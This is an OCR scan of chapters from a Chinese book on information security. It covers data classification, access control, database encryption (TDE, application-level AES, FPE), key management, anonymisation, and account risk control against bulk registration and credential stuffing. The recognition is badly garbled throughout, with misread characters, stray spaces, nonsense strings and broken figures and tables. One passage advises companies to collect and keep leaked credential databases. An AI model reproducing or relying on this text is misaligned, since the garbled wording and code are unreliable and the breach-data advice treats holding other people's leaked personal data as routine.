再 以 电 商 平台 账号 为 例 ， 用 户 名 ， 昵 称 属于 公开 信息 ， 收 货 地 址 属 
于 非 公开 信息 ， 而 支付 卡号 属于 机 密 信息 ， 他 们 都 是 结构 化 数据 ， 但 在 
产品 设计 与 实现 的 时 候 需要 分 类 进行 保护 。 


从 更 高 维度 看 ， 很 多 企业 都 做 开放 平台， 通过 API 把 数据 开放 给 第 
三 方 应 用 ， 里 面 束 涉及 更 抽象 的 数据 分 类 分 级 ， 对 供应 链 上 下 游 的 数据 
提取 者 赋予 特定 的 访问 控制 策略 。 


14.2 访问 控制 


访问 控制 (Identity & Access Management, IAM) 示意 图 如 图 14-2 
所 示 。 





典型 的 IAM 应 该 包含 如 下 几 方 面 的 元 素 : 

1) 谁 (定义 角色 ) 

2) 对 哪些 资源 (定义 对 象 ) 

3) 拥有 定义 “允许 ”还 是 “拒绝 ”) 

A) 哪些 具体 权限 《定义 增删 改 查 和 其 他 的 操作 ) 


5) 有 效 期 是 多 久 《 定 义 失效 时 间 ) 





Expire: 


015-12-31 A 


NS 





图 14-2 ” IAM 示意 图 


在 此 基础 上 还 可 以 继续 添加 : 组 策略 、 通 配 符 、 根 据 条 件 触发 或 定 
义 访 问 控制 策略 、 多 因素 认证 等 。 


14.3 ”数据 隔离 


对 于 在 线 应 用 的 后 台数 据 存储 而 言 ， 敏 感 数据 《〈 例 如 用 户 库 、 口 
令 、 密 保 、 文 付 等 ) 应 考虑 分 表 分 库存 储 ， 应 尽量 减少 一 个 上 层 应 用 出 
现 漏洞 时 的 影响 ， 例 如 某 个 应 用 出 现 SQL 注 入 时 ， 它 应 该 只 能 影响 那个 
应 用 对 应 的 库 ， 而 不 是 全 部 的 数据 。 大 型 网 站 的 后 台数 据 存储 几乎 都 是 
ay EN) CSharding) ， 从 安全 上 应 考虑 敏感 数据 的 集中 存储 ， 过 于 分 散 
会 加 大 监控 的 成 本 ， 因 为 “如 果 所 有 的 都 重要 那 就 等 于 没有 一 样 是 重要 
的 "， 如 图 14-3 所 示 。 














对 于 终端 设备 ， 应 考虑 沙 箱 级 隔离 (参见 图 14-4) ， 屏 蔽 非法 程序 
的 恶意 访问 ， 或 合法 程序 的 非 授 权 越 界 访问 〈B 广 的 App 访 问 A 广 App 的 
个 人 数据 ) 。 容 絮 本 里 使 用 TPM (可 信 计 算 ) 等 技术 。 





在 云 的 虚拟 化 环境 中 ， 一 般 情况 用 VPC 隔离 。 但 对 于 GovCloud 这 种 
保密 要 求 极 高 的 系统 也 采用 了 物理 隔离 。 物 理 隔离 虽然 有 点 跟 云 计算 一 
切 资源 丝 可 共享 的 理念 有 点 不 搭 调 ， 但 在 安全 上 却 是 真实 的 需求 。 
AWS 全 球 贡 点 如 图 14-5 所 示 。 
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型 互联 网 的 数据 库 分 片 


图 14-3 大 


vA, MyApp.app 


m] 
ios Documents 


c Library 


| tmp 





图 14-4 IOS 沙 箱 示 意图 
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图 14-5 ”AWS 全 球 节 点 


14.4 Aye yes 





对 于 结构 化 数据 ， 比 如 用 户 注册 的 吴 份 证 号 、 信 用 卡 信息 在 持久 化 
时 需要 考虑 选择 性 字段 加 密 ， 目 前 可 以 使 用 的 技术 包括 
TDE (Transparent Data Encryption, HAIA) 和 应 用 级 加 密 ， 对 
于 非 结 构 化 数据 ， 例 如 ， 文 件 、 图 片 一 般 使 用 自 实现 的 文件 加 密 或 磁盘 
块 加 密 。 在 数据 传输 过 程 中 TLS 成 了 目前 事实 上 的 标准 。 








1.TDE 透 明 数 据 加 密 


TDE 的 原理 如 图 14-6 所 示 。 


TDE 可 对 数据 和 日 志文 件 执行 实时 VO 加 密 和 解密 ， 这 种 加 密使 用 
数据 库 加 密 密 钥 (DEK) ， 该 密 钥 存储 在 数据 库 引 导 记 录 中 以 供 恢复 时 
使 用 。DEK 是 使 用 存储 在 服务 器 的 master 数 据 库 中 的 证 书 保护 的 对 称 密 
fH, 或 者 是 由 EKM (扩展 密 钥 管 理 模块 ) 保护 的 非 对 称 密 钥 。TDE 保 护 
对 象 为 静态 数据 《相对 于 内 存 中 的 热 数据 而 言 ) ， 即 数据 和 日 志文 件 。 
开发 人 员 可 以 使 用 AES 和 3DES 加 密 算法 来 加 密 数 据 ， 且 无 需 更 改 现 有 
的 应 用 程序 。 
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图 14-6 ”TDE 的 原理 图 


目前 只 有 Oracle 和 微软 的 SQL Server 支 持 TDE， 在 互联 网 行业 普遍 
流行 去 IOE 的 时 代 ，MySQL 是 实际 上 的 关系 型 数据 库 选 择 标准 ， 所 以 
TDE 将 会 有 一 定局 限 性 。 





2. 应 用 加 密 


对 于 大 部 分 使 用 MySQL 的 数据 库 ， 可 以 使 用 应 用 级 的 加 密 ， 例 如 


下 面 的 SQL 语句 : 





INSERT INTO Customers (CustomerFirstName, CustomerLastName) VALUES 
(AES_ENCRYPT('Ayazero', @key), AES _ENCRYPT( 'Ayaz3ro',@key); 





加 密 后 的 字段 不 支持 模糊 查询 ， 可 能 会 影响 应 用 的 正常 功能 和 程序 
开发 ， 例 如 下 面 的 语句 可 能 就 不 行 了 : 





SELECT CustomerFirstName, CustomerLastName from Customers WHERE 
CustomerName LIKE 'Ay%';” 





直接 比较 的 语句 需要 变更 为 : 





SELECT CustomerFirstName, CustomerLastName FROM Customers WHERE 
CustomerFirstName = AES ENCRYPT('Ayazero', @key); 





在 设计 应 用 时 ， 例 如 打算 加 密 喘 份 证 字段 ， 可 以 使 用 HMAC-SHAI1 
将 其 变 成 哈 硕 值 ， 加 密 后 的 状态 仍然 是 唯一 的 ， 与 其 他 人 的 吴 份 证 哈 希 
后 产生 的 值 一 样 的 概率 很 小 ， 查 询 时 根据 HMAC 的 哈 希 值 与 查询 字符 串 
经 同样 哈 希 函数 处 理 后 的 值 对 比 ， 则 加 密 字 段 不 用 解密 。 


VE: google 已 宣布 2017 年 开始 不 再 文 持 SHA-1 这 种 不 安全 的 算法 ， 
可 以 使 用 SHA-2 等 替代 算法 。 


3.FPE《〈 保 留 格式 加 密 ) 


传统 加 密 算 法 会 改变 原 明 文字 段 的 数据 长 度 和 数据 类 型 ， 而 

FPE REAJI) 则 要 求 加 密 前 的 明文 与 加 密 后 的 密 文 拥 有 相同 数 
据 长 度 和 数据 类 型 ， 其 原理 如 图 14-7 所 示 。 例 如 被 拖 库 后 ， 信 用 卡 卡号 
字段 实际 上 是 加 蜜 的， 但 看 上 去 仍然 是 数字 明文 ， 且 长 度 与 正 闻 的 卡号 
一 致 ， 如 果 攻 击 者 拿 这 些 卡 号 去 盗 刷 会 发 现 都 不 好 用 。FPE 不 仅 可 以 解 
决 敏感 数据 加 密 的 问题 ， 还 可 以 解决 将 生产 环境 数据 迁移 到 测试 环境 又 
不 泄露 用 户 数据 的 问题 ， 除 了 持久 化 数据 ，FPE 在 数据 传输 过 程 中 也 一 
样 可 以 使 用 。 
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图 14-7 FPE 〈 保 留 格式 加 密 ) 机 制 


CipherCloud 和 Voltage Security 是 与 AWS 合 作 的 两 家 数据 加 密 解 决 方 
案 提供 隘 ， 他 们 的 方案 都 支持 FPE， 并 提供 了 一 种 近似 透明 的 数据 加 密 











方式 。FPE 在 数据 写 入 数据 库 实 例 之 前 对 原文 进行 加 密 或 符号 化 ， 同 时 
加 密 后 的 字段 插入 数据 库 原 字段 时 不 会 改变 表 的 数据 结构 。 


4. 文 件 /磁盘 加 密 


磁盘 文件 加 密 主 要 是 针对 非 结 构 化 数据 ， 例 如 备份 文件 等 。 应 用 本 
身 不 需要 关注 加 密 过 程 ， 只 需要 将 文件 扔 到 加 密 存储 介质 上 ， 局 性 能 的 
磁盘 加 密 一 般 都 通过 硬件 加 密 忌 片 实现 。 筷 的 通病 是 一 旦 密 钥 泄露 就 会 
失效 ， 表 14-1 是 对 几 种 主流 加 密 方 式 的 对 比 。 








表 14-1 几 种 主流 加 密 方式 的 对 比 





dm-crypt +/- 








分 类 Loop-AES | LUKS | Truecrypt eCryptfs EncFs 
加 密 什 么 整个 块 设备 交 件 
存放 加 密 数 据 | “一块 磁 盘 或 磁盘 分 区 
ie 现 有 文件 系统 中 的 一 个 目录 
的 容器 一 个 文件 作为 一 个 虚拟 分 区 A 





和 文件 系统 的 


实现 机 理 


比 文件 系统 更 底层 - 不 关心 是 加 密 的 是 一 个 块 设备 、 
文件 系统 、 分 区 、LVM 卷 还 是 其 他 的 形式 
通过 内 核 空间 


在 现 有 文件 系统 上 添加 新 层 


用 户 态 (EUSE) 























Metadata 的 存 LUKS: LUKS 每 个 加 密 文件 | 容器 头 部 的 控 
储 位 置 Header 设备 的 开始 和 | 的 头 部 制 文件 中 

加 密 密 钥 存储 LUKS: LUKS | 末尾 密 钥 文件 可 存 | 容器 头 部 的 控 
位 置 header 储 任意 位 置 制 文件 中 








Apple 的 iCloud 中 对 个 人 备份 数据 上 传 没有 选择 上 述 加 密 方式 ， 而 是 
自己 现实 了 一 种 分 块 加 密 ， 如 图 14-8 所 示 。 


其 原理 是 将 整个 备份 切割 成 4M 大 小 的 块 ， 


分 别 加 密 每 个 块 ， 然 后 


保存 到 云端 ， 它 的 好 处 是 ， 因 为 文件 本 身 已 加 密 ， 所 以 不 再 需要 第 三 方 


的 磁盘 级 加 密 ， 只 需要 存储 到 任意 的 非 加 密 介 质 就 可 以 ， 例 如 亚马逊 S3 
或 微软 Azure 等 平台 ， 因 为 密 钥 和 文件 加 密 的 元 数据 由 Apple 自 己 保存 ， 
所 以 把 数据 扔 到 第 三 方 存储 即使 是 被 人 下 载 了 也 无 法 解密 ， 分 块 后 可 以 
提高 上 传 的 并 发 性 能 同时 支持 断 点 续 传 ，Apple 本 身 只 保存 有 限 的 数 
据 ， 而 把 大 量 的 存储 空间 负担 交 给 云 平 台 ， 利 用 云 平台 的 资源 弹性 伸缩 
最 大 化 自己 的 ROI， 人 否则 为 用 户 的 备份 数据 建立 海量 存储 是 一 件 吃 力 不 
讨好 的 事 。 
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图 14-8 iPhone 手机 备份 使 用 分 块 加密 





5. 噪 音 混淆 


上 上面 的 方法 都 比较 “正统 ”， 正 统 的 方法 通用 性 强 ， 容 易 推 动 开 发 去 
实现 ， 但 是 对 攻击 者 来 说 获取 数据 的 途径 也 很 清晰 ， 那 就 是 拖 库 并 获取 





密 钥 。 在 对 抗 比较 激烈 的 场景 中 往往 需要 “等 正 出 奇 ”， 需 要 一 些 “ 稚 点 
了 


噪音 混 消 就 是 在 正常 的 用 户 数据 里 掺 入 “噪声 因 了 于 ”， 它 并 非 一 种 加 
密 算 法 〈 这 里 并 不 是 在 讨论 K 匿 名 、 差 分 之 类 的 话题 )》， 而 是 变换 了 形 
式 让 数据 不 再 以 原来 的 面 钥 出 现 。 这 种 思路 跟 代码 混 消 如 出 一 罗 ， 对 抗 
的 效果 上 比较 依赖 于 信息 不 对 称 ， 一 旦 信息 不 对 称 被 打破 ， 就 会 失效 。 





14.5 密 钥 管理 





密 钥 是 所 有 加 密 过 程 的 *$SSO”， 是 最 大 的 单 点 问题 ， 所 以 密 钥 本 刁 
的 存储 和 管理 可 能 比 具 体 怎 么 加 密 更 重要 ， 而 一 旦 密 钥 丢失 ， 所 有 的 数 
据 将 不 可 找 回 。 








如 图 14-9 所 示 ， 蜜 钥 管 理 基础 设施 KMD 通常 分 两 部 分 : 密 钥 的 
存储 ， 对 密 钥 本 和 喘 的 访问 授权 管理 。 更 上 层 的 加 密 方法 通常 由 应 用 自身 


去 实现 。 








图 14-9 ”分 层 的 KMI 架 构 


在 海量 用 户 服务 体系 下 的 密 钥 管理 需要 解决 儿 个 方面 的 问题 : 


单一 的 密 钥 无 法 文 持 海量 架构 ， 必 须 是 多 级 层级 密 钥 体系 。 


文 持 密 钥 的 全 生命 周期 管理 : 创建、 激活、 禁用、 转换 (创建 新 
的 密 钥 对 当前 时 间 点 以 后 的 数据 进行 加 解密 ， 保 存 老 的 密 钥 用 以 解密 过 
去 用 该 密 钥 加 密 的 数据 ， 在 加 密 数 据 中 标记 对 应 的 密 钥 版 本 以 通知 KMS 
用 哪个 密 钥 来 解密 ) 、 分 发 、 备 份 、 销 毁 。 





.物理 安全 : 防止 云 平台 厂商 ，IDC 托 管 方 读 取 密 钥 。 


理论 上 ， 在 云 计 算 环境 中 ， 如 果 没 有 使 用 基于 密 钥 的 数据 加 密 ， 且 
对 密 钥 信 任 与 存储 设备 (HSM) 拥有 完全 的 控制 权 ， 都 不 能 保障 数据 安 
全 和 隐私 泄露 的 问题 。 


14.6 ”安全 删除 


对 于 加 复数 据 或 加 密 文件 系统 ， 不 需要 删除 数据 ， 只 需要 使 用 安全 
的 方法 删除 加 密 密 铀 ， 对 于 非 加 密 数 据 ， 需 要 使 用 安全 的 方法 不 仅 格 式 
化 元 数据 ， 而 且 还 要 重 写 数据 块 ， 物 理 上 可 以 使 用 消 磁 等 手段 。 





14.7 匿名 化 





互联 网 环境 里 广告 和 推荐 系统 都 依赖 于 跟 中 用 户 偏好 和 历史 行为 做 
推荐 ， 风 控 和 业务 数据 挖掘 类 的 BI 系统 也 需要 跟踪 用 户 行为 ， 如 设备 指 
纹 、cookie、 帆 布 指纹 每 各 种 技术 都 可 以 用 来 跟踪 用 户 ， 在 互联 网 尤其 
是 移动 互联 网 环境 下 ， 很 多 时 候 实 际 上 并 不 需要 确切 的 用 户 名 就 能 跟踪 
到 这 个 人 ， 假 如 你 手机 的 无 线 网 卡 的 MAC 地 址 是 固定 不 变 的 ， 那 无 论 
何 时 何 地 ， 只 要 看 到 这 个 MAC 地 址 就 知道 你 大 概 在 什么 地 方 。 








为 了 尽 可 能 地 解 绑 个 人 隐私 和 用 户 行为 的 关系 ， 出 现 了 匿名 化 的 产 
品 设计 理念 ， 例 如 苹果 用 一 个 UUID (Universally Unique Identifier， 通 
用 唯一 识别 码 ) 作为 用 户 标 识 ， 如 下 代码 所 示 : 





-(NSString*) uuid 


{ 
1. CFUUIDRef puuid = CFUUIDCreate( nil ); 
2. CFStringRef uuidString = CFUUIDCreateString( nil, puuid ); 
3. NSString * result = (NSString*)CFStringCreateCopy( NULL, uuidString); 
4. CFRelease(puuid) ; 
5. CFRelease(uuidString); return 


[result autorelease]/; 





App 用 这 个 UUID 跟 踪 用 户 访 问 、 付 费 行为 。 对 于 不 同 的 App， 即 使 
是 同一 个 用 户 UUID 的 值 也 是 不 同 的 ， 并 且 重 新 安装 同一 个 App 时 会 再 


生成 新 的 UUID 的 值 ， 这 样 做 是 为 了 尽 可 能 地 避免 通过 “拼图 ”来 竣 出 这 
个 用 户 完 整 的 偏好 ， 也 避免 了 再 注册 一 衣 用 户 名 密码 等 信息 。 





在 应 用 系统 对 访问 者 只 通过 单 因 素 认 证 ， 而 不 是 通过 多 因素 认证 充 
分 鉴 权 的 情况 下 ， 只 对 其 开放 有 限 的 数据 ， 对 于 隐私 相关 的 重要 数据 内 
有 通过 完整 的 多 因素 认证 或 者 基于 风 控 系 统 的 判断 为 可 信访 问 时 才 开 
局 ， 苹 果 iCloud 的 一 个 例子 ， 如 图 14-10 所 示 。 


首先 账户 要 启用 2FA， 当 启用 2FA 后 ， 即 使 攻击 者 取得 了 账户 的 口 
令 直 接 登 录 iCloud， 也 会 看 到 如 下 界面 ， 邮 件 、 通 讯 录 、 照 片 等 均 显 示 
为 上 锁 不 可 访问 的 状态 ， 如 图 14-11 所 示 。 





司 用 两 步 验证 


要 启用 两 步 验证 ， 您 必须 接受 以 下 条 件 : 
启用 两 步 验证 后 : 
。 您 需要 使 用 以 下 其 中 两 种 方式 来 管理 您 的 Apple ID: 密码 、 受 信任 设备 或 恢复 
密 钥 。 


。 如 果 您 忘记 密码 ， 您 将 需要 恢复 密 钥 和 受信 任 设备 来 重 设 密码 。Apple 不 能 代 
您 重 设 密码 。 


j 
。 您 需要 使 用 App 专用 密码 登录 任何 非 Apple 提供 的 App 和 服务 。 
。 您 必须 自行 负责 妥善 保管 您 的 恢复 密 铀 。 


V 我 已 了 解 上 述 条 件 . 


取消 | 启用 两 步 验证 








图 14-10 ”Apple 账户 启用 2FA 验 证 界面 


iCloud a 请 验证 您 的 身份 以 访问 iCloud.com 的 所 有 内 容 
您 仍然 可 以 使 用 " 直 拷 我 的 iPhone" 对 丢失 的 设备 进行 定位 。 


"#423844 iPhone 





图 14-11 未 通过 2FA 认 证 时 无 法 访问 敏感 数据 


这 种 方式 可 防止 一 般 程度 的 口令 失 欠 、 撞 库 、 扫 号 引发 的 盗号 问 
题 ， 这 会 比较 好 地 保护 隐私 。 
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第 15 章 ”业务 安全 与 风 控 





业务 安全 的 起 源 是 由 于 黑 产 的 存在 ， 很 多 年 前 黑 产 就 通过 黑客 入 
侵 ， 拖 库 ， 然 后 卖 数 据 去 赚钱 。 但 现在 随 着 互联 网 承载 的 各 种 业务 的 兴 
起 ， 黑 产 熏 利 的 门槛 开始 降低 ， 不 再 须要 入 侵 了 对 方才 能 套利 ， 仅 通过 
业务 层面 的 漏洞 ， 防 范 不 严 或 打 法 律 探 边 球 惑 能 获 利 。 











另 一 方面 ， 企 业 间 的 恶性 竞争 ， 呐 赌 毒 等 合 规 性 要 求 也 成 为 业务 安 
全 的 驱动 力 。 


本 章 将 描述 互联 网 行业 各 种 典型 业务 的 主要 风险 和 控制 方法 。 


15.1 对 抗原 则 


在 谈 及 具体 的 风 控 措施 之 前 ， 先 罗列 一 下 业务 安全 的 策略 和 原则 ， 
具体 如 下 : 


相对 的 风 控 而 非 绝 对 的 防 黑 业务 安全 的 目标 是 相对 意义 上 的 
风险 控制 ， 而 不 是 绝对 意义 上 的 防 黑 。 拖 库 只 要 发 生 一 次 束 非 第 严重 ， 
但 是 业务 安全 ， 即 使 漏 掉 了 一 些 ， 但 解决 了 大 部 分 的 问题 ， 那 就 算 及 格 
Te 








HIE RAA m EKETA Ri, FEHR 
WEN SAA MRTA A M A eh 
你 。 比 如 注册 一 张 银 行 卡 的 成 本 > 获取 一 张 手机 SIM 卡 的 成 本 > 注册 一 个 
免费 邮箱 的 成 本 。 








水 远 的 情报 一 一 知己 知 彼 ， 百 战 不 列 。 了 解 黑 产 怎 么 干 活 事 半 功 
f RAMa IREA E EH, JIER A SERIA AA 
报 ， 蹲 在 对 方 的 QQ 群 里 也 能 搞 到 情报 。 

方法 比 技术 更 重要 一 FAR, fe RBC. RAR SLE TIE 
尽 的 ， 并 且 会 不 断 地 消耗 内 部 的 研发 资源 和 IDC 资 源 ， 改 变 战 场 规则 可 
能 起 到 一 招 退 敌 的 效果 。 


数据 比 算 法 更 重要 一 大 数据 的 典型 特征 ， 算 法 可 以 不 高 大 上 ， 
但 是 没有 数据 或 数据 太 少 ， 风 控 这 件 事 也 许 你 玩 不 起 来 。 





勤 能 补 抄 一 一 也 许 你 没有 大 数据 ， 但 是 不 断 地 改变 业务 逻辑 ， 不 
断 地 升级 会 使 对 手 疲 于 奔 俞 。 自 PS3/PSV 时 代 起 ，sony 不 再 封 堵 破 解 ， 
而 是 以 更 短 的 迭代 周期 ， 更 高 的 版 本 发 布 频率 升级 操作 系统 ， 新 的 游戏 
必须 运行 于 高 版 本 系统 之 上 ， 使 破解 者 疲惫 不 堪 ， 盗 版 用 户 都 懒得 再 破 
fo WEES Zs, AIh IRR o 


忽略 性 能 、 用 户 体 验 和 成 本 的 风 控 没有 意义 一 一 风 控 本 喘 的 意义 
在 于 保障 正常 用 户 和 平台 目 身 ， 如 果 正 常用 户 体验 受 损 或 大 面积 误杀 ， 
则 风 控 起 了 反 效 果 。 同 样 ， 一 家 创业 型 公司 不 太 可 能 有 资源 为 了 做 风 控 
而 息 遍 整个 ipv4 的 地 址 库 。 





纵深 防御 一 一 纵深 、 多 维度 、 降 维 防御 在 风 控 场景 仍然 适用 ， 使 
用 漏斗 模型 ， 由 机 器 规则 处 理 最 原始 的 数据 ， 逐 步 筛 选 过 滤 ， 由 人 工 审 
核 做 最 后 一 道 防 线 。 


杀 鸡 给 猴 看 只 要 条 件 允 许 ， 用 法 律 武 器 端 掉 主力 ， 用 风 控 手 
段 扫 尾 。2: 8 原则 ， 对 危害 最 大 的 部 分 不 一 定 要 用 常规 手段 ， 无 论 什 么 
土方 法 ， 能 达成 目的 就 好 。 能 在 安全 大 会 上 讲 的 高 大 上 的 方法 不 一 
解决 问题 性 价 比 最 高 的 手段 。 








人 民 的 战争 一 一 教育 正常 的 用 户 安 全 意识 ， 动 用 一 切 资 源 和 手段 


RAET URADE STAIR 


社工 库 一 一 敌人 有 的 ， 我 也 要 有 。 


i52 Mae 





WKS EE ETA TEKS ERMA SIS A AR, WER A 
游 、 第 三 方 文 付 、 社 交 网 络 、 即 时 通信 等 ， 是 需要 登录 后 产生 数据 和 区 
互 的 应 用 ， 而 搜索 、 导 航 、 杀 毒 客户 端 不 需要 登录 也 能 用 ， 则 属于 弱 账 
号 体系 应 用 。 





1. 注 册 





对 于 羊毛 党 而 言 ， 平 时 需要 “ 养 号 ”， 批 量 注 册 一 批号 放 着 不 用 ， 等 
到 促销 之 类 的 活动 开始 了 才 用 。 垃 圾 注册 、 虚 假 小 写 是 垃圾 抢购 、 欺 诈 
钓鱼 的 源头 ， 账 号 安全 要 从 源头 收 紧 。 


对 抗 垃圾 注册 一 般 的 手段 包括 : 


:图片 验证 码 


邮件 验证 码 


短信 验证 码 


语音 验证 码 


电话 语 首 验证 人 码 





有 些 产 品 是 PC 客户 端 ， 或 者 web 注册 界面 不 是 使 用 标准 的 加 密 算法 
通过 https post 请 求 ， 目 动 注册 机 需要 模拟 客户 器 协议 才能 工作 ， 逆 同 的 
协议 如 果 经 常 变 化 或 者 复杂 程度 较 高 束 会 成 为 黑 产 研发 的 一 个 门槛 。 





真实 的 新 用 户 如 果 在 注册 时 使 用 了 原来 其 他 网 站 被 拖 库 的 邮件 地 址 
和 相同 的 密码 怎么 办 ?对 甲 方 安全 团队 而 言 ， 自 己 应 持 有 各 种 社工 库 ， 
并 随时 更 新 ， 在 用 户 注册 时 比 对 社工 库 内 容 ， 如 个 人 注册 信息 相同 ， 做 
出 风险 提示 或 强制 修改 密码 。 








对 于 使 用 分 布 式 代理 的 注册 机 ， 如 果 有 账号 风 控 系统 的 可 以 根据 来 
源 属性 和 机 器 人 行为 特征 标注 恶意 灰 度 ， 从 而 给 与 不 同 级 别 的 验证 码 。 
对 于 产品 线 较 长 的 企业 来 说 ,一 般 这 个 环 市 只 做 检测 ， 不 做 “严打 ， 因 
为 像 网 游 等 业务 注册 小 号 也 是 正常 的 ， 具 体 打 击 和 封锁 全 略 留 给 更 后 站 
的 业务 系统 去 做 。 








此 外 ， 对 于 利用 注册 接口 检测 用 户 名 /账号 是 否 存 在 的 暴力 枚 举 也 
应 该 做 人 机 识别 。 以 防止 批量 得 到 账号 信息 用 于 批量 扫 号 等 动作 。 














登录 环节 的 问题 包括 撞 库 、 暴 力 破解 、 盗 号 登录 、 非 常用 设备 登 


录 、 黑 产 小 号 和 僵尸 号 登录 等 。 





对 于 大 型 平台 而 言 ， 登 录 的 入 口 往往 不 止 一 个 ， 且 除了 Web 还 有 其 





他 的 协议 入 口 ， 例 如 POP3、 手 机 APP 等 ， 尽 可 能 使 入 口 统一 ， 以 便于 做 
集中 管控 。 


使 用 风 控 系统 对 比 用 户 画 像 检 测 登 录 地 域 来 源 、 卫 属性 、 可 信 设 
备 、 登 录 频 率 、 代 理 使 用 习惯 等 从 而 推送 不 同 复杂 等 级 的 验证 码 或 开局 
多 因素 认证 。 或 根据 离线 数据 ， 即 一 段 时 间 内 的 请 求 〈 行 为 ) 异常 ， 以 
及 其 他 业务 风 控 子 系统 判断 的 行为 异常 ， 再 调用 风 控 的 接口 推送 二 次 认 
证 要 求 做 人 机 识别 ， 如 图 15-1 所 示 。 


其 他 业务 风 控 


事前 : 判断 用 户 风 
险 等 级 ， 根 据 需 要 a 
出 二 次 验证 。 事 中 : Ca 离线 风 控 引擎 
人 让 已 登录 的 高 风险 
/行为 特 用 户 重新 验证 
实时 风 控 引擎 
EEE + 


| SSO 服务 器 注册 / 


复杂 验 “ 数据 
JS 指数 证 码 登陆 / 密码 找 回 a 高 速 缓存 一 


基础 策略 | > 





图 15-1 ”账号 风 控 架构 示意 图 


对 于 大 规模 的 扫 写 、 綦 力 破解 ， 除 了 依赖 于 机 右 规 则 外 ， 还 应 准备 
手工 策略 和 应 急 预 案 。 


风 控 服务 依赖 于 很 多 数据 ， 例 如 设备 指纹 、 卫 信誉 库 、 黑 产 手 机 号 
等 ， 获 取 这 些 数据 是 一 个 比较 庞大 的 工程 ， 对 于 大 型 企业 而 言 相 对 容易 


获取 ， 中 小 企业 在 不 借助 第 三 方 数据 合作 的 情况 下 ， 目 己 去 抓 取 数 据 成 


本 会 非常 高 。 


3. 密 保 / 密 码 找 回 


QQ 的 密 保 功能 如 图 15-2 所 示 。 


首先 平台 应 提供 多 种 密码 保护 手段 ， 并 在 用 户 界 面 显 眼 处 提示 或 安 
全 教育 。 其 次 ， 应 确保 平台 的 密码 找 回 /密码 重 置 等 功能 不 存在 逻辑 漏 
洞 可 以 被 绕 过 ， 或 及 生 过 上 度 信 息 披 露 。 账 户 展 现 本 丑 不 应 该 存在 可 以 被 
息 虫 抓 取 聚合 后 用 于 撞 库 或 暴力 破解 的 信息 。 


在 认证 设备 之 间 提 供 异 地 登录 提醒 、 异 常 登录 提醒 、 破 解 账号 提 
醒 。 对 密码 找 回 业 务 进行 人 机 识别 ， 防 止 批 量 找 回 、 密 码 重 置 等 接口 的 
机 器 行为 。 
4. 多 因素 认证 

重要 的 操作 必须 使 用 2FA 〈( 双 因素 认证 ) 或 MFA (多 因素 认证 ) ， 
例如 密码 找 回 、 密 码 重 置 、 安 装 证 书 等 。 记 得 某 大 型 电 商 平台 安装 证 书 


不 需要 二 次 认证 ， 所 以 他 们 的 大 BOSS 站 在 台 上 被 消费 者 问 及 盗号 问题 
HIE S uit OT o 


QQ 安全 中 心 


AQ.QQ.COM 用 心 守护 件 网 QQ 


帐号 保护 密码 管理 


B ERLA 


eee 防盗 利器 : 剑 灵 游 戏 锁 上 线 
on 纯 定 即 送 神龙 工商 伐 


密 保 问题 


cox nA CAER 
om ;设置 密 保 问题 区 Be Mea 
密 保 问 题 mM 除 ey 


TERIA 


安全 中 心 手机 版 


立即 绑 定 





图 15-2 QQ 的 密 你 功能 





前 段 时 间 茶 广 邮 箱 账 亏 疑似 拖 库 ， 引 发 了 大 量 的 iCloud 账 户 被 盗 ， 
没有 开局 2FA 的 用 户 被 彻底 控制 ， 手 机 被 iCloud 远 程 锁 定 ， 不 交 钱 就 直 
接 远 程控 除数 据 ，IOS 擦 数据 是 直接 擦 加 密 文 件 系 统 的 密 钥 ， 基 本 不 可 





5. 多 设备 登录 





多 设备 登录 时 ， 应 保证 同 平台 不 能 <“ 串 号 ”一 一 同一 账号 可 以 在 PC 端 
和 APP 端 同时 登录 ， 但 不 能 在 两 个 PC 端 登录 同一 账号 ， 或 不 同 的 手持 设 
备 上 登录 同一 账号 〈iCloud 这 种 可 以 在 iPhone 和 iPad 同 时 登录 ， 为 不 同 
设备 间 共 享 和 同步 数据 而 设计 的 账户 体系 除外 ) ， 如 果 在 另 一 台 PC 上 





登录 同一 账号 ， 前 一 个 将 被 强制 足下 线 ， 或 前 一 个 设备 保持 登录 状态 ， 
第 二 次 登录 请 求 由 户主 的 认证 设备 通过 2FA 之 后 才能 登录 ， 再 将 前 者 踢 
下 线 。 








多 设备 同时 登录 时 应 支持 交叉 认证 ， 例 如 PC 端的 可 疑 登录 自动 发 
起 2FA 请 求 到 手机 端 ， 经 由 手机 端 确认 后 才能 从 PC 端 登录 。 微 信 的 设计 
如 图 15-3 所 示 。 


中 国联 通 4G 攻 $A “ul 39% 18:44 


€ 





Windows 微 信 已 登录 


手机 消息 免 扰 


退出 Windows 微 信 


图 15-3” 微 信和 多 设备 登录 界面 


6. 账 号 共 储 体系 





绝 大 多 数 互联 网 平台 都 采用 SSO 的 账号 共享 体系 ， 在 开放 平台 业务 
上 使 用 Oauth、Openid 等 联合 认证 协议 。 一 方面 Oauth 等 协议 坑 比 较 多 ， 
非常 容易 出 问题 ， 男 一 方面 内 部 在 对 账户 数据 的 使 用 上 也 容易 不 遵守 规 





范 ， 过 度 共 孚 和 滥用 账户 数据 ， 这 些 都 需要 在 相关 的 应 用 安全 开发 标准 
中 约束 。 





大 型 平台 一 般 有 很 多 应 用 ， 和 凭借 一 个 登录 token 直 接 无 障碍 登录 所 
有 子 应 用 在 安全 上 并 不 是 一 个 好 的 设计 ， 一 旦 被 XSS 盗 取 token 束 相当 于 
全 线 溃 防 。 所 以 在 功能 和 应 用 入 口 比 较 多 的 平台 ， 会 对 业务 划 权 重 ， 分 
类 分 级 ， 涉 及 个 人 认证 信息 、 个 人 隐私 、 支 付 类 的 一 般 属 于 高 级 Web 安 
全 域 ， 信 息 发 布 类 的 归 入 一 般 Web 域 。 对 高 安全 域 的 应 用 ， 登 录 除 了 
SSO token 之 外 ， 引 入 第 二 层 认证 的 secure token， 黑 客 光 有 一 个 token 登 
录 不 了 重要 应 用 ， 只 有 两 个 token 齐 备 才 可 以 继续 登录 。 安 全 研究 者 
d4rkwind 实 现 secure token 的 一 个 例子 ， 如 图 15-4 所 示 。 


统一 登录 分 散 认 证 
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图 15-4 某 互联 网 公司 SSO 登 录 流 程 


YE: BDUSS 是 SSO token，STOKEN 是 secure token，LOGA 是 一 个 
用 户 跳 转 的 接口 ， 跳 转 到 passport 〈 即 SSO) ， 正 常用 户 passport 域 下 肯 
定 有 STOKEN，LOGA 成 功 后 会 给 原 域名 STOKEN， 所 以 只 需要 跳 转 就 
可 以 安全 登录 而 无 需 输入 密码 。 这 个 方案 会 比 一 般 的 单 点 登录 多 一 次 跳 
转 ， 但 对 用 户 基 本 无 感知 ， 这 样 做 完全 不 显得 激进 。 


